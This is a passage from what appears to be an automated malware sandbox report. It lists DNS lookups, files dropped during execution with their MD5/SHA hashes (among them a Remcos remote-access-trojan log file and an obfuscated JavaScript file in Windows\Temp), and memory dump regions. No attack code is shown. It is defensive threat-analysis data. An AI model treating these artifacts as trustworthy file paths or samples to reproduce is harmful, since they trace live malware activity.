    1
    1

    DNS Request

    56.163.245.4.in-addr.arpa

  • 8.8.8.8:53
    241.42.69.40.in-addr.arpa
    dns
    71 B
    145 B
    1
    1

    DNS Request

    241.42.69.40.in-addr.arpa

  • 8.8.8.8:53
    172.210.232.199.in-addr.arpa
    dns
    74 B
    128 B
    1
    1

    DNS Request

    172.210.232.199.in-addr.arpa

  • 8.8.8.8:53
    77.190.18.2.in-addr.arpa
    dns
    70 B
    133 B
    1
    1

    DNS Request

    77.190.18.2.in-addr.arpa

  • 8.8.8.8:53
    14.227.111.52.in-addr.arpa
    dns
    72 B
    158 B
    1
    1

    DNS Request

    14.227.111.52.in-addr.arpa

  • 8.8.8.8:53

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\ProgramData\remcos\logs.dat

    Filesize

    144B

    MD5

    510a364823ec4188609f8e311a1bdf7e

    SHA1

    10fcb9899987d677aa0b741dcbae83597c1ea3a9

    SHA256

    78db8e93bf7a68477bd6ba07c0b6f72cd16f23f42770ead0f31e4c26326abcd5

    SHA512

    9ff6c3331ccafc64871380b826f4c21ab865f7f8eafbad4109e2f99a04a872c2770a342174a730befb26324761ed0f067adfd2e9e8a9d6718e7027dc7dc8b102

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

    Filesize

    3KB

    MD5

    f41839a3fe2888c8b3050197bc9a0a05

    SHA1

    0798941aaf7a53a11ea9ed589752890aee069729

    SHA256

    224331b7bfae2c7118b187f0933cdae702eae833d4fed444675bd0c21d08e66a

    SHA512

    2acfac3fbe51e430c87157071711c5fd67f2746e6c33a17accb0852b35896561cec8af9276d7f08d89999452c9fb27688ff3b7791086b5b21d3e59982fd07699

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    64B

    MD5

    d8b9a260789a22d72263ef3bb119108c

    SHA1

    376a9bd48726f422679f2cd65003442c0b6f6dd5

    SHA256

    d69d47e428298f194850d14c3ce375e7926128a0bfb62c1e75940ab206f8fddc

    SHA512

    550314fab1e363851a7543c989996a440d95f7c9db9695cce5abaad64523f377f48790aa091d66368f50f941179440b1fa94448289ee514d5b5a2f4fe6225e9b

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_mhqvgftk.qo0.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\kqelxapnqggqyolidygkpeurtbxorgmui

    Filesize

    4KB

    MD5

    bc25ccf39db8626dc249529bcc8c5639

    SHA1

    3e9cbdb20a0970a3c13719a2f289d210cdcc9e1d

    SHA256

    b333f8c736c701bc826886f395d928731850cbce6db77be752b3cf7979114904

    SHA512

    9a546127bddc1d187e674cda82e6c5046cac7f3e6f9515aed68d5bff2264b9d679d857dd97270e10826cd11ce2d92d82dd7f9801e19027e346b60bcc814cca1a

  • C:\Windows\Temp\あ😒2⛑ぇ😯4♘オ😍4⛒く😾5.js

    Filesize

    153KB

    MD5

    e39538cf60c1a9768333bf00e0262702

    SHA1

    ab80fc0c03325ea2647fc486b028cbc7ce705b3b

    SHA256

    dd3dd3f0da4553ef81c7fe5ae31f89454187e3b9cbc068a76ca7a9ae8cf2a873

    SHA512

    807a7a24ce847771a9cada7dd8d5a547a8946f2f86b61c8c612aaa675fbf55ad8ab96b381684ae0aece38e11535c46b2ae284973ec7324f28b6cd7eaacebd86f

  • memory/1108-47-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

  • memory/1108-52-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

  • memory/1108-50-0x0000000000400000-0x0000000000478000-memory.dmp

    Filesize

    480KB

  • memory/2432-67-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-92-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-40-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-41-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-42-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-43-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-45-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-38-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-39-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-35-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-31-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-100-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-99-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-76-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-91-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-83-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-28-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-61-0x0000000010000000-0x0000000010019000-memory.dmp

    Filesize

    100KB

  • memory/2432-64-0x0000000010000000-0x0000000010019000-memory.dmp

    Filesize

    100KB

  • memory/2432-65-0x0000000010000000-0x0000000010019000-memory.dmp

    Filesize

    100KB

  • memory/2432-66-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-84-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-68-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2432-75-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/2676-8-0x000001E0707E0000-0x000001E070802000-memory.dmp

    Filesize

    136KB

  • memory/3928-48-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

  • memory/3928-51-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

  • memory/3928-53-0x0000000000400000-0x0000000000462000-memory.dmp

    Filesize

    392KB

  • memory/4808-27-0x000001EDF8E60000-0x000001EDF8FB8000-memory.dmp

    Filesize

    1.3MB

  • memory/5112-49-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

  • memory/5112-55-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

  • memory/5112-54-0x0000000000400000-0x0000000000424000-memory.dmp

    Filesize

    144KB

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.